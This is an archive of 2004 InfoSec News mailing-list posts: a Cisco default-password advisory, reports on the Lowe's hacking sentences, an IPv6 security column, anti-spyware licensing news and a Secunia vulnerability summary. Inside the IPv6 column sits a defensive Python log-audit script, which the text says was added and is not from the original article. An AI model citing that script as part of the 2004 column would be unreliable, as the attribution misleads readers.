The Cisco Guard and Traffic Anomaly Detector products, introduced this June, are security appliances used to detect potential denial-of-service traffic and divert the traffic to a non-critical network segment where it can be monitored and analyzed.

Certain software versions on these appliances ship with default logon "root" and a password that is the same on all systems. Someone logging in as "root" on these devices could change configurations on the box, redirect traffic to other network segments, or simply deactivate the device, which would allow DoS attack traffic to enter a network undetected.

Cisco says users should change the default "root" password on the affected appliances. Users can also upgrade to version 3.1 or later of the Cisco Guard and Cisco Traffic Anomaly Detector software, which asks users to choose a "root" password during installation.

More information on each of these security notices can be found here [1] and here [2].

[1] http://www.cisco.com/en/US/products/products_security_advisory09186a008037cd59.shtml#summary
[2] http://www.cisco.com/en/US/products/products_security_advisory09186a008037d0c5.shtml

From isn at c4i.org Thu Dec 16 02:02:36 2004
From: isn at c4i.org (InfoSec News)
Date: Thu Dec 16 02:21:24 2004
Subject: [ISN] Michigan hacker who tapped into hardware chain's computers gets 9 years
Message-ID:

http://www.freep.com/news/statewire/sw108763_20041215.htm

December 15, 2004

CHARLOTTE, N.C. (AP) -- One of three Michigan men who hacked into the national computer system of Lowe's hardware stores and tried to steal customers' credit card information was sentenced Wednesday to nine years in federal prison. The government said it is the longest prison term ever handed down in a computer crime case in the United States.

Brian Salcedo of Whitmore Lake, Mich., pleaded guilty in August to conspiracy and other hacking charges.
Salcedo's sentence, imposed by U.S. District Judge Lacy Thornburg, exceeds that given to the hacker Kevin Mitnick, who spent more than 5 1/2 years behind bars, according to a Justice Department Web site that tracks cyber-crime prosecutions.

"I think the massive amount of potential loss that these defendants could have imposed was astounding, so that's what caused us to seek a substantial sentence against Mr. Salcedo," federal prosecutor Matthew Martens said.

Two other men are awaiting sentencing in the Lowe's case. One of them, Adam Timmins, of Waterford Township, Mich., became one of the first people convicted of "wardriving," in which hackers go around with an antenna, searching for vulnerable wireless Internet connections.

Prosecutors said the three men tapped into the wireless network of a Lowe's store in Southfield, Mich., used that connection to enter the chain's central computer system in North Wilkesboro, N.C., and installed a program to capture credit card information. Lowe's officials said the men did not obtain any such information.

The case was prosecuted in Charlotte because it is home to an FBI cyber-crime task force.

Mitnick led the FBI on a three-year manhunt that ended in 1995 and is said to have cost companies millions of dollars by stealing their software and altering computer information. Victims included Motorola, Novell, Nokia and Sun Microsystems.

-=-

On the Net:

U.S. Justice Department computer intrusion cases: http://www.cybercrime.gov/cccases.html

From isn at c4i.org Fri Dec 17 03:24:16 2004
From: isn at c4i.org (InfoSec News)
Date: Fri Dec 17 03:40:43 2004
Subject: [ISN] Michigan hacker who tapped into hardware chain's computers gets 9 years
Message-ID:

Forwarded from: matthew patton

I'm glad they got caught and all but 9yrs for a guy who hacked the system but DID NOT get any credit cards?
If he'd gotten his hands on a few thousand and went on a shopping spree, sure, but this is like a guy who gets caught breaking and entering but he's stuck 1/2 way thru the door with his hands empty. And Mitnick got 5 and HE stole a ton of stuff... I thought the punishment was supposed to match the crime or some such blather.

From isn at c4i.org Fri Dec 17 03:24:45 2004
From: isn at c4i.org (InfoSec News)
Date: Fri Dec 17 03:40:45 2004
Subject: [ISN] The move on to IPv6
Message-ID:

http://www.computerworld.com/securitytopics/security/story/0,10801,98298,00.html

Opinion by Cody Christman
Verio
DECEMBER 16, 2004
COMPUTERWORLD

Despite the success of Internet Protocol Version 4 (IPv4), at the age of 31, this current protocol is due for a significant technology makeover. The original design of IP wasn't intended for many of today's Internet uses. The fathers of the Internet couldn't foresee today's typical Wi-Fi Web surfer at the local coffee shop conducting a secure transaction over a browser.

Most security precautions were ignored in the development of IPv4, and they have continued to be a challenge for application developers since then. The IPsec security protocol was an afterthought, and Network Address Translation (NAT) -- which has been widely deployed to solve the address-depletion problem and for perceived security benefits -- makes true end-to-end, secure applications difficult to deploy.

In IPv6, however, IPsec support is mandated, allowing devices to securely authenticate remote nodes and encrypt communication with them. In addition, NAT is eliminated in IPv6, allowing all nodes to communicate with one another using globally routable addresses. Since IPv6 offers almost infinite address space, NAT isn't needed. This brings back the end-to-end nature for which the Internet was designed in the first place. Other features built into IPv6 help to augment security, such as autoconfiguration, quality of service (QoS) and mobility.
These security features help to create a new business model -- one of secure, end-to-end communications between almost any types of devices, fixed or mobile. This is in contrast to today's IPv4 networks, where NAT generally reduces communication to one-way (outbound), and encryption, when available, is usually implemented on global address segments while LAN segments remain unencrypted and unsecured.

The U.S. Department of Defense has embraced IPv6 for the above-mentioned reasons. In June 2003, the DOD announced its plan to complete transition to IPv6 by fiscal 2008, and as of Oct. 1, 2003, all network assets developed, procured or acquired are to be IPv6-capable. The DOD concluded that IPv6 adoption is necessary to meet the agency's requirements for mobility and end-to-end security. The DOD's IT budget is the government's largest at $25 billion per year, giving an enormous boost to network security and IPv6.

The DOD has adopted a net-centric technical vision. According to this vision, future combat systems demand ubiquity (IPv6-centricity), mobility and ad hoc networking and security. For example, from a networking standpoint, the soldier is viewed as a site -- a network of onboard systems providing integrated real-time data. Weapon firing and supply data would be fed back to commanders as well as precise position information. Health information such as a soldier's heart rate, blood pressure and temperature would also be relayed. The soldier could also receive positioning data about friends and foes to increase situational awareness and save lives. The data security (authentication and encryption) requirements in this model are an obvious necessity. Unlike today's military model of autonomous systems and a broadcast information push, the net-centric vision relies on bidirectional, end-to-end secure communications enabled by IPv6.
For businesses and consumers, there are an unforeseeable number of new applications and devices that can be networked in a secure fashion. IPv6 is already making an impact in the field of home networking, including appliance management, multimedia entertainment and home security. Such applications, especially home security tools, demand end-to-end authentication and encryption. With IPv6, Digital Subscriber Line and cable modem subscribers can set up home networks and monitor and control devices securely from any remote location. Wireless network cameras can be easily deployed to monitor a residence, and electronic locks can be installed to remotely lock or unlock doors.

Businesses will be able to leverage the security, mobility and QoS features of IPv6. For example, the IP flow-label QoS feature built directly into IPv6 will help improve the quality of encrypted voice over IP calls. In addition, traveling salespeople can wirelessly transfer information and documents safely from remote locations to their headquarters, even while roaming through different Wi-Fi hot spots.

Some argue that IPv6 proponents use v4 address-depletion scare tactics to promote the new protocol. Though address-space depletion is a real issue, there are many other forces driving IPv6 deployment. True end-to-end security, which is enabled by IPv6 but doesn't exist in IPv4 as it's often implemented today, is the future of the Internet.

Time to get ready

Even if businesses don't have immediate plans to implement IPv6, preparing for the inevitable transition now as opposed to later will only decrease the burden on IT administrators. This process doesn't have to be daunting if a thoughtful approach is taken. Plans should accommodate an implementation spanning a maximum of three to four years. When IPv6 gains momentum, migration to the new protocol will be swift, and those who haven't planned ahead risk finding themselves at a disadvantage.
Having plans in place will also simplify the auditing processes for hardware, software (shrink-wrapped and internally developed) and operating systems on IPv6 compatibility. As long as vendor-support contracts have been maintained, this process shouldn't be too painful or expensive. Most hardware will already be compliant, and software and operating system upgrades can follow normal maintenance cycles within the transition window.

If precautions aren't taken, the transition from IPv4 to IPv6 could be cause for network security concerns. Without proper perimeter security, hackers could use IPv6 to gain access to a LAN, which could compromise both IPv6 and IPv4 network assets. Therefore, the same care taken to write and implement an IPv4 security policy should be taken with IPv6, even with all its benefits. Introducing IPv6 into a network, like any other new protocol, requires that firewall configurations and other security measures be well thought-out and tested.

Finally, there are several IPv4/IPv6 interoperability mechanisms available to businesses to assist in the transition. They fall into three major categories: dual-stack, tunneling and translation. A dual-stack transition is the generally preferred method when devices are both IPv4- and IPv6-aware, allowing the two protocols to coexist in the same network. Tunneling techniques allow the transport of IPv6 traffic over an IPv4 infrastructure -- as much of the Internet is today. The final interoperability method -- protocol translation -- may be required in some instances, but is generally not recommended because it's basically an IPv4/IPv6 NAT.

The interoperability method or combination of methods will depend on each business' environment and network requirements. IPv6 offers several alternatives to choose from that should suit any need. These tools, along with a well thought-out and executed migration plan, will lead to a smooth transition to IPv6.
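The column's closing advice, that IPv6 perimeter policy deserves the same care as the IPv4 policy and that tunneling and translation mechanisms carry IPv6 across the IPv4 network, can be turned into a concrete review step. The Python script below is an added example and is not part of Christman's column or any Verio tool; the firewall log lines, the `src=/dst=/dport=` log format and the two inbound port policies are all constructed for illustration. It uses the standard-library `ipaddress` module to recognise 6to4, Teredo and IPv4-mapped sources, recovers the IPv4 address embedded in each (useful when correlating with IPv4-only logs), and flags accepted IPv6 connections to ports the reviewed IPv4 policy never opened, which is exactly the kind of gap through which a newly enabled protocol bypasses an old policy.

```python
"""Audit IPv6 firewall accepts for transition-tunnel sources and for ports
that the IPv4 policy never exposed.  Added example; the sample log lines,
the log format and both policies below are constructed, not taken from
the article or from any product."""
import ipaddress
import re

# Constructed ACCEPT lines from a hypothetical dual-stack firewall.
SAMPLE_LOG = """\
2004-12-16T10:00:01 ACCEPT src=2002:c000:0204::1 dst=2001:db8::10 dport=22
2004-12-16T10:00:02 ACCEPT src=2001:0:4136:e378:8000:63bf:3fff:fdd2 dst=2001:db8::10 dport=445
2004-12-16T10:00:03 ACCEPT src=::ffff:198.51.100.7 dst=2001:db8::10 dport=80
2004-12-16T10:00:04 ACCEPT src=2001:db8:1::5 dst=2001:db8::10 dport=443
2004-12-16T10:00:05 ACCEPT src=203.0.113.9 dst=192.0.2.10 dport=80
"""

# Constructed inbound policies: the IPv4 rules were reviewed; the IPv6
# rules were added during the transition without the same review.
V4_ALLOWED_PORTS = {80, 443}
V6_ALLOWED_PORTS = {80, 443, 22, 445}

LINE_RE = re.compile(r"src=(\S+) dst=(\S+) dport=(\d+)")


def classify_source(addr_text):
    """Return (kind, embedded_ipv4) for one source address.

    kind is 'ipv4', 'native-v6', '6to4', 'teredo' or 'ipv4-mapped'.
    embedded_ipv4 is the IPv4 address carried inside a transition address
    (the 6to4 site, the Teredo client, or the mapped host), else None.
    """
    addr = ipaddress.ip_address(addr_text)
    if addr.version == 4:
        return "ipv4", None
    if addr.sixtofour is not None:          # 2002::/16, site IPv4 in bits 16-47
        return "6to4", str(addr.sixtofour)
    if addr.teredo is not None:             # 2001::/32, (server, client) tuple
        return "teredo", str(addr.teredo[1])
    if addr.ipv4_mapped is not None:        # ::ffff:0:0/96
        return "ipv4-mapped", str(addr.ipv4_mapped)
    return "native-v6", None


def policy_gaps(v4_allowed, v6_allowed):
    """Ports reachable over IPv6 that the IPv4 policy never permitted."""
    return set(v6_allowed) - set(v4_allowed)


def audit(log_text, v4_allowed=V4_ALLOWED_PORTS, v6_allowed=V6_ALLOWED_PORTS):
    """Scan ACCEPT lines and return the ones a reviewer should look at."""
    gaps = policy_gaps(v4_allowed, v6_allowed)
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        src, dst, port = m.group(1), m.group(2), int(m.group(3))
        kind, inner = classify_source(src)
        reasons = []
        if kind in ("6to4", "teredo", "ipv4-mapped"):
            reasons.append(f"{kind} transition source, embedded IPv4 {inner}")
        if kind != "ipv4" and port in gaps:
            reasons.append(f"port {port} open on IPv6 but not in IPv4 policy")
        if reasons:
            findings.append({"src": src, "dst": dst, "dport": port,
                             "kind": kind, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_LOG):
        print(f["src"], f["dport"], "; ".join(f["reasons"]))
```

Run stand-alone it prints the three flagged lines (the 6to4 source reaching port 22, the Teredo client reaching port 445, and the IPv4-mapped source, which a native-IPv6 host should never present on the wire). In practice `audit()` would be fed the site's own firewall or flow-log export and the two policy sets would be generated from the actual rulebases, so that the IPv6 rules are checked against the IPv4 baseline on every change.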
Cody Christman is director of product engineering at Verio Inc., an Englewood, Colo.-based provider of Internet access, Web site hosting and other network services.

From isn at c4i.org Fri Dec 17 03:25:30 2004
From: isn at c4i.org (InfoSec News)
Date: Fri Dec 17 03:40:47 2004
Subject: [ISN] Legal questions dog Microsoft anti-spyware buy
Message-ID:

http://www.nwfusion.com/news/2004/1216legalquest.html

By Paul Roberts
IDG News Service
12/16/04

With the ink barely dry on Microsoft's acquisition of anti-spyware company Giant Company Software, questions have arisen about the ownership of the anti-spyware code Microsoft bought.

Microsoft acknowledged that Sunbelt Software of Clearwater, Fla., is part owner of Giant's AntiSpyware software. That agreement between Giant and Sunbelt does not prevent Microsoft from further developing new products based on the Giant code, according to Microsoft.

However, Sunbelt President Alex Eckelberry said that his company has exclusive rights over elements of the technology, including the ability to offer SDKs for Giant AntiSpyware technology. That could make it difficult for Microsoft to integrate Giant technology with other products.

Microsoft issued a short statement regarding Sunbelt's claims Thursday saying, "We understand that Giant granted a co-ownership right to Sunbelt concerning an earlier version of Giant's anti-spyware software product. However, the granting of that right to Sunbelt does not constrain either party from innovating and developing new products that are based on that earlier version."

A Microsoft spokeswoman declined to comment specifically on Sunbelt's other claims.

Sunbelt and Giant have had a close business relationship since 2002, with Sunbelt licensing and selling technology developed by Giant, according to Eckelberry. Among other things, Sunbelt struck an agreement to sell Giant's antispam product, Spam Inspector, under its own label, iHateSpam.
Until September, the company also sold a product, CounterSpy, that used Giant's AntiSpyware engine. The companies parted ways in September, with Sunbelt focusing on the corporate antispyware market and Giant focused on the home PC antispyware market, Eckelberry said.

However, Sunbelt claims co-ownership of everything related to Giant's AntiSpyware product up to Sept. 20, including "the user interface elements, explorer tools (and) software update services," Eckelberry said.

While the co-ownership agreement will not prevent Microsoft from changing the Giant product to suit its own needs, Sunbelt's exclusive rights to create and distribute SDKs for the Giant AntiSpyware engine could require Microsoft to seek permission from Sunbelt before allowing third-party companies access to Giant's data.

"For example, if Symantec went to Microsoft and said 'Hey, we want to get some of that (antispyware) data', they would have to go through Sunbelt," Eckelberry said.

"It's an interesting situation," said Steve Frank, a partner in the patent and intellectual property group at Boston law firm Testa, Hurwitz and Thibeault.

While Eckelberry said Sunbelt has no right to share in future profits from Giant sales, the company still expects to benefit from the acquisition through co-ownership of Giant AntiSpyware definitions, which can be used in Sunbelt products. Sunbelt also has the right to develop and distribute the Giant SDK, he said.

Microsoft was probably aware of Giant's obligations to Sunbelt, but "didn't care," or were impressed enough with the Giant technology to overlook the contractual complications, Eckelberry said.

Microsoft and Sunbelt have been in contact, but have discussed mostly "boring, technical stuff," such as distribution of the Giant AntiSpyware definitions. The companies have not discussed issues surrounding the SDK, Eckelberry said.

But attorney Frank doubts that Microsoft would have been so cavalier, had it known about Sunbelt's rights to the Giant code.

"These are exactly the kinds of things that come out of the woodwork when there's lots of money on the table," he said. "This will come as most unwelcome news."

From isn at c4i.org Fri Dec 17 03:25:52 2004
From: isn at c4i.org (InfoSec News)
Date: Fri Dec 17 03:40:49 2004
Subject: [ISN] Second hacker who entered Lowe's computers gets 26 months
Message-ID:

http://www.detnews.com/2004/technology/0412/17/technology-35606.htm

By Paul Nowell
Associated Press
December 17, 2004

CHARLOTTE, N.C. -- A second defendant was sentenced Thursday to more than two years in federal prison for his role in a scheme to hack into the Lowe's national computer system to steal credit card information.

U.S. District Judge Lacy Thornburg sentenced Adam Botbyl to two years and two months. Another defendant, Brian Salcedo, was sentenced Wednesday to nine years in prison. Both of the 21-year-olds are from Michigan.

Assistant U.S. Attorney Matthew Martens told the judge the defendants tried to get data that could have caused huge economic losses for the Mooresville-based home improvement chain and its customers.

"The damage that could have been caused by these defendants would have been astronomical," he said. "The fact that it didn't happen wasn't because they retreated. It's because the FBI caught them in the act."

Botbyl, who pleaded guilty to one count of conspiracy, could have faced five years in prison.

"I would like to apologize to the court and to the victim, Lowe's," he told the judge.

Salcedo pleaded guilty in August to conspiracy, transmitting computer code to cause damage to a computer, unauthorized computer access and computer fraud.

A third defendant, Paul Timmins, awaits sentencing after pleading guilty in the case.

-=-

U.S. Justice Department computer intrusion cases: http://www.cybercrime.gov/cccases.html

From isn at c4i.org Fri Dec 17 03:26:16 2004
From: isn at c4i.org (InfoSec News)
Date: Fri Dec 17 03:40:51 2004
Subject: [ISN] Students uncover dozens of Unix software flaws
Message-ID:

http://news.zdnet.com/2100-1009_22-5492969.html

By Robert Lemos
CNET News.com
December 15, 2004

Students of iconoclastic computer scientist Daniel Bernstein have found some 44 security flaws in various Unix applications, according to a list of advisories posted online.

The flaws, which range from minor slipups in rarely used applications to more serious vulnerabilities in software that ships with most versions of the Linux operating system, were found as part of Bernstein's graduate-level course at the University of Illinois at Chicago.

"Every program is used somewhere--this was a requirement for the homework--but the programs vary widely in popularity," Bernstein, a professor of computer science at the university, stated in an e-mail interview Thursday.

The advisories regarding the flaws were dated Wednesday and can be found on the Web site of student James Longstreet.

Bernstein said it was necessary for programmers to learn security, both to analyze existing programs and to create new ones. "If any (programmer makes) a security mistake, then your computer is vulnerable to attack," he said in the e-mail interview. "So we have to teach all programmers how to avoid these mistakes."

The latest crop of security flaws comes two days after a software-testing company announced that it had found 985 flaws in the latest Linux kernel during the past four years using the company's analysis software. While the number seems high, the company said it is far lower than the number associated with most commercial software.

Each person in the class during the fall semester had to find 10 flaws, a task that counted toward 60 percent of their grade for the class, according to class notes posted on Bernstein's Web site.
With only 44 flaws discovered among a reported 25 students, Bernstein said he is rethinking the grading curve. "At the end of the course, I decided to throw that scale away and think about how much the students had learned," he wrote.

From isn at c4i.org Fri Dec 17 03:27:43 2004
From: isn at c4i.org (InfoSec News)
Date: Fri Dec 17 03:40:54 2004
Subject: [ISN] Secunia Weekly Summary - Issue: 2004-51
Message-ID:

========================================================================

The Secunia Weekly Advisory Summary
2004-12-09 - 2004-12-16

This week : 64 advisories

========================================================================
Table of Contents:

1.....................................................Word From Secunia
2....................................................This Week In Brief
3..............................This Week's Top Ten Most Read Advisories
4.......................................Vulnerabilities Summary Listing
5.......................................Vulnerabilities Content Listing

========================================================================
1) Word From Secunia:

Monitor, Filter, and Manage Security Information
- Filtering and Management of Secunia advisories
- Overview, documentation, and detailed reports
- Alerting via email and SMS

Request Trial:
https://ca.secunia.com/?f=s

========================================================================
2) This Week in Brief:

ADVISORIES:

Microsoft has issued the monthly security updates for December. The updates cover vulnerabilities in almost every single operating system from Microsoft.

All Microsoft users are advised to visit WindowUpdate and check for available updates.

Additional details about the specific vulnerabilities can be found in referenced Secunia advisories below.
References:
http://secunia.com/SA13466/
http://secunia.com/SA13465/
http://secunia.com/SA13464/
http://secunia.com/SA13463/
http://secunia.com/SA13462/

--

3 more browsers have been found vulnerable to the Window Injection vulnerability, which was disclosed last week by Secunia Research.

The affected browsers are: iCab, Internet Explorer for Mac, and OmniWeb.

Secunia has an online demonstration of the vulnerability here:
http://secunia.com/multiple_browsers_window_injection_vulnerability_test/

References:
http://secunia.com/SA13356/
http://secunia.com/SA13412/
http://secunia.com/SA13418/

VIRUS ALERTS:

During the last week, Secunia issued 1 MEDIUM RISK virus alert and 1 HIGH RISK virus alert. Please refer to the grouped virus profiles below for more information:

Zafi.D - HIGH RISK Virus Alert - 2004-12-15 09:04 GMT+1
http://secunia.com/virus_information/13871/zafi.d/

Zafi.D - MEDIUM RISK Virus Alert - 2004-12-14 15:31 GMT+1
http://secunia.com/virus_information/13871/zafi.d/

========================================================================
3) This Week's Top Ten Most Read Advisories:

1. [SA13129] Mozilla / Mozilla Firefox Window Injection Vulnerability
2. [SA13251] Microsoft Internet Explorer Window Injection Vulnerability
3. [SA12889] Microsoft Internet Explorer Two Vulnerabilities
4. [SA13253] Opera Window Injection Vulnerability
5. [SA13252] Safari Window Injection Vulnerability
6. [SA13402] Netscape Window Injection Vulnerability
7. [SA13404] Microsoft Internet Explorer FTP Command Injection Vulnerability
8. [SA13254] Konqueror Window Injection Vulnerability
9. [SA11978] Multiple Browsers Frame Injection Vulnerability
10. [SA12712] Mozilla / Mozilla Firefox / Camino Tabbed Browsing Vulnerabilities

========================================================================
4) Vulnerabilities Summary Listing

Windows:
[SA13464] Microsoft Windows HyperTerminal Buffer Overflow Vulnerability
[SA13462] Microsoft Word for Windows Converter Buffer Overflow Vulnerabilities
[SA13427] Gore: Ultimate Soldier CD-Key Validation Buffer Overflow
[SA13426] GameSpy CD-Key Validation SDK Buffer Overflow Vulnerability
[SA13411] MIMEsweeper for SMTP PDF File Processing Denial of Service
[SA13466] Microsoft Windows WINS "Name" Validation Vulnerability
[SA13463] Microsoft Windows NT DHCP Buffer Overflow Vulnerabilities
[SA13423] Codename Eagle Empty UDP Datagram Denial of Service Vulnerability
[SA13415] FirstClass HTTP Large Request Handling Denial of Service
[SA13465] Microsoft Windows Kernel and LSASS Privilege Escalation Vulnerabilities
[SA13460] Kerio MailServer / ServerFirewall Potential User Password Disclosure
[SA13445] Symantec Windows LiveUpdate NetDetect Privilege Escalation
[SA13438] Winmail Server Installation Path Disclosure Weakness
[SA13416] F-Secure Policy Manager "fsmsh.dll" Path Disclosure Weakness
[SA13409] Microsoft Office SharePoint Portal Server Disclosure of User Credentials

UNIX/Linux:
[SA13474] Adobe Acrobat Reader "mailListIsPdf()" Function Buffer Overflow
[SA13461] Debian update for zgv
[SA13435] Red Hat update for imlib
[SA13425] Citadel/UX "lprintf()" Function Format String Vulnerability
[SA13417] Debian update for xfree86
[SA13456] Red Hat update for ncompress
[SA13449] zgv/xzgv Multiple Integer Overflow Vulnerabilities
[SA13439] Gentoo update for file
[SA13436] Sun Solaris Sendmail DNS TXT Records Buffer Overflow
[SA13428] Gentoo update for phprojekt
[SA13418] OmniWeb Window Injection Vulnerability
[SA13412] iCab Window Injection Vulnerability
[SA13459] Gentoo update for nfs-utils
[SA13458] Red Hat update for itanium kernel
[SA13457] Red Hat update for kernel
[SA13440] nfs-utils "getquotainfo()" Buffer Overflow Vulnerability
[SA13429] SGI IRIX update for samba
[SA13455] Red Hat update for apache/mod_ssl
[SA13454] Red Hat update for ruby
[SA13447] Opera Default Application "kfmclient exec" Security Issue
[SA13437] Sun Java System Web Server / Application Server Session ID Disclosure
[SA13432] mnoGoSearch Cross-Site Scripting Vulnerabilities
[SA13469] Linux Kernel IGMP and "__scm_send()" Vulnerabilities
[SA13473] Debian update for atari800
[SA13442] Mandrake update for postgresql
[SA13430] mtr "mtr_curses_keyaction()" Function Buffer Overflow Vulnerability
[SA13410] Linux Kernel "sys32_ni_syscall" and "sys32_vm86_warning" Buffer Overflows
[SA13480] Gentoo update for ncpfs
[SA13444] Mandrake update for iproute2
[SA13443] OpenBSD isakmpd Denial of Service Vulnerability

Other:
[SA13434] Novell Netware "nlm" Screensaver Password Bypass Vulnerability

Cross Platform:
[SA13479] GNUBoard "doc" Parameter Arbitrary File Inclusion Vulnerability
[SA13478] MoniWiki Multiple File Extensions Script Upload Vulnerability
[SA13471] Adobe Reader / Adobe Acrobat Multiple Vulnerabilities
[SA13468] Ethereal Multiple Vulnerabilities
[SA13448] NetMail IMAPD Unspecified Buffer Overflow Vulnerability
[SA13424] phpMyAdmin Two Vulnerabilities
[SA13421] phpBB Attachment Mod Two Vulnerabilities
[SA13419] MediaWiki "images" Arbitrary Script Upload and Execution Vulnerability
[SA13467] phpGroupWare Cross-Site Scripting and SQL Injection Vulnerabilities
[SA13451] Sugar Sales Arbitrary Local File Inclusion Vulnerabilities
[SA13446] Lithtech Engine UDP Datagram Denial of Service Vulnerability
[SA13431] SQLgrey Postfix greylisting service Unspecified SQL Injection
[SA13422] PhpDig Unspecified Vulnerability
[SA13420] PHP Live! Unspecified Vulnerability
[SA13413] IlohaMail Unspecified Vulnerability
[SA13452] UBB.threads "Cat" Cross-Site Scripting Vulnerabilities
[SA13441] UseModWiki "wiki.pl" Cross-Site Scripting Vulnerability
[SA13414] PHP Gift Registry "message" Cross-Site Scripting Vulnerabilities

========================================================================
5) Vulnerabilities Content Listing

Windows:

--

[SA13464] Microsoft Windows HyperTerminal Buffer Overflow Vulnerability

Critical:    Moderately critical
Where:       From remote
Impact:      System access
Released:    2004-12-14

Brett Moore has reported a vulnerability in Microsoft Windows, which can be exploited by malicious people to compromise a user's system.

Full Advisory:
http://secunia.com/advisories/13464/

--

[SA13462] Microsoft Word for Windows Converter Buffer Overflow Vulnerabilities

Critical:    Moderately critical
Where:       From remote
Impact:      System access
Released:    2004-12-14

Some vulnerabilities have been reported in Microsoft Windows, which can be exploited by malicious people to compromise a user's system.

Full Advisory:
http://secunia.com/advisories/13462/

--

[SA13427] Gore: Ultimate Soldier CD-Key Validation Buffer Overflow

Critical:    Moderately critical
Where:       From remote
Impact:      System access
Released:    2004-12-14

Luigi Auriemma has reported a vulnerability in Gore: Ultimate Soldier, which potentially can be exploited by malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/13427/

--

[SA13426] GameSpy CD-Key Validation SDK Buffer Overflow Vulnerability

Critical:    Moderately critical
Where:       From remote
Impact:      System access
Released:    2004-12-13

Luigi Auriemma has reported a vulnerability in the Gamespy CD-Key Validation SDK, which potentially can be exploited by malicious people to compromise a vulnerable system.
Full Advisory: http://secunia.com/advisories/13426/

--
[SA13411] MIMEsweeper for SMTP PDF File Processing Denial of Service
Critical: Moderately critical
Where: From remote
Impact: DoS
Released: 2004-12-10
A vulnerability has been reported in MIMEsweeper for SMTP, which can be exploited by malicious people to cause a DoS (Denial of Service).
Full Advisory: http://secunia.com/advisories/13411/

--
[SA13466] Microsoft Windows WINS "Name" Validation Vulnerability
Critical: Moderately critical
Where: From local network
Impact: System access
Released: 2004-12-14
Kostya Kortchinsky has reported two vulnerabilities in Microsoft Windows, allowing malicious people to compromise a vulnerable system.
Full Advisory: http://secunia.com/advisories/13466/

--
[SA13463] Microsoft Windows NT DHCP Buffer Overflow Vulnerabilities
Critical: Moderately critical
Where: From local network
Impact: System access, DoS
Released: 2004-12-14
Kostya Kortchinsky has reported two vulnerabilities in Microsoft Windows NT, allowing malicious people to cause a DoS (Denial of Service) or compromise a vulnerable system.
Full Advisory: http://secunia.com/advisories/13463/

--
[SA13423] Codename Eagle Empty UDP Datagram Denial of Service Vulnerability
Critical: Less critical
Where: From remote
Impact: DoS
Released: 2004-12-13
Luigi Auriemma has reported a vulnerability in Codename Eagle, which can be exploited by malicious people to cause a DoS (Denial of Service).
Full Advisory: http://secunia.com/advisories/13423/

--
[SA13415] FirstClass HTTP Large Request Handling Denial of Service
Critical: Less critical
Where: From remote
Impact: DoS
Released: 2004-12-14
XWaRloRDX and DiLA have reported a vulnerability in FirstClass, which potentially can be exploited by malicious people to cause a DoS (Denial of Service).
Full Advisory: http://secunia.com/advisories/13415/

--
[SA13465] Microsoft Windows Kernel and LSASS Privilege Escalation Vulnerabilities
Critical: Less critical
Where: Local system
Impact: Privilege escalation
Released: 2004-12-14
Cesar Cerrudo has reported two vulnerabilities in Microsoft Windows, allowing malicious, local users to escalate their privileges.
Full Advisory: http://secunia.com/advisories/13465/

--
[SA13460] Kerio MailServer / ServerFirewall Potential User Password Disclosure
Critical: Less critical
Where: Local system
Impact: Exposure of sensitive information
Released: 2004-12-14
Javier Munoz has reported a security issue in Kerio MailServer and Kerio ServerFirewall, which potentially can be exploited by malicious, local users to gain knowledge of sensitive information.
Full Advisory: http://secunia.com/advisories/13460/

--
[SA13445] Symantec Windows LiveUpdate NetDetect Privilege Escalation
Critical: Less critical
Where: Local system
Impact: Privilege escalation
Released: 2004-12-14
Secure Network Operations has reported a vulnerability in Symantec Windows LiveUpdate, which can be exploited by malicious, local users to gain escalated privileges.
Full Advisory: http://secunia.com/advisories/13445/

--
[SA13438] Winmail Server Installation Path Disclosure Weakness
Critical: Not critical
Where: From remote
Impact: Exposure of system information
Released: 2004-12-13
Ziv Kamir has reported a weakness in WinMail Server, which can be exploited by malicious people to disclose certain system information.
Full Advisory: http://secunia.com/advisories/13438/

--
[SA13416] F-Secure Policy Manager "fsmsh.dll" Path Disclosure Weakness
Critical: Not critical
Where: From local network
Impact: Exposure of system information
Released: 2004-12-10
Oliver Karow has reported a weakness in F-Secure Policy Manager, which can be exploited by malicious people to disclose certain system information.
Full Advisory: http://secunia.com/advisories/13416/

--
[SA13409] Microsoft Office SharePoint Portal Server Disclosure of User Credentials
Critical: Not critical
Where: Local system
Impact: Exposure of sensitive information
Released: 2004-12-10
Alexander Fichman has reported a weakness in Microsoft Office SharePoint Portal Server 2003, which may disclose sensitive information to malicious, local users on the system.
Full Advisory: http://secunia.com/advisories/13409/

UNIX/Linux:
--
[SA13474] Adobe Acrobat Reader "mailListIsPdf()" Function Buffer Overflow
Critical: Highly critical
Where: From remote
Impact: System access
Released: 2004-12-15
iDEFENSE has reported a vulnerability in Adobe Acrobat Reader, which can be exploited by malicious people to compromise a user's system.
Full Advisory: http://secunia.com/advisories/13474/

--
[SA13461] Debian update for zgv
Critical: Highly critical
Where: From remote
Impact: System access
Released: 2004-12-15
Debian has issued an update for zgv. This fixes multiple vulnerabilities, which potentially can be exploited by malicious people to compromise a vulnerable system.
Full Advisory: http://secunia.com/advisories/13461/

--
[SA13435] Red Hat update for imlib
Critical: Highly critical
Where: From remote
Impact: System access, DoS
Released: 2004-12-13
Red Hat has issued an update for imlib. This fixes multiple vulnerabilities, which potentially can be exploited by malicious people to compromise a vulnerable system.
Full Advisory: http://secunia.com/advisories/13435/

--
[SA13425] Citadel/UX "lprintf()" Function Format String Vulnerability
Critical: Highly critical
Where: From remote
Impact: System access
Released: 2004-12-13
CoKi has reported a vulnerability in Citadel/UX, which can be exploited by malicious people to compromise a vulnerable system.
Full Advisory: http://secunia.com/advisories/13425/

--
[SA13417] Debian update for xfree86
Critical: Highly critical
Where: From remote
Impact: DoS, System access
Released: 2004-12-13
Debian has issued an update for xfree86. This fixes some vulnerabilities, which can be exploited by malicious people to cause a DoS (Denial of Service) or compromise a vulnerable system.
Full Advisory: http://secunia.com/advisories/13417/

--
[SA13456] Red Hat update for ncompress
Critical: Moderately critical
Where: From remote
Impact: System access
Released: 2004-12-14
Red Hat has issued an update for ncompress. This fixes an old vulnerability, which potentially can be exploited by malicious people to compromise a vulnerable system.
Full Advisory: http://secunia.com/advisories/13456/

--
[SA13449] zgv/xzgv Multiple Integer Overflow Vulnerabilities
Critical: Moderately critical
Where: From remote
Impact: System access
Released: 2004-12-14
Some vulnerabilities have been reported in zgv/xzgv, which potentially can be exploited by malicious people to compromise a vulnerable system.
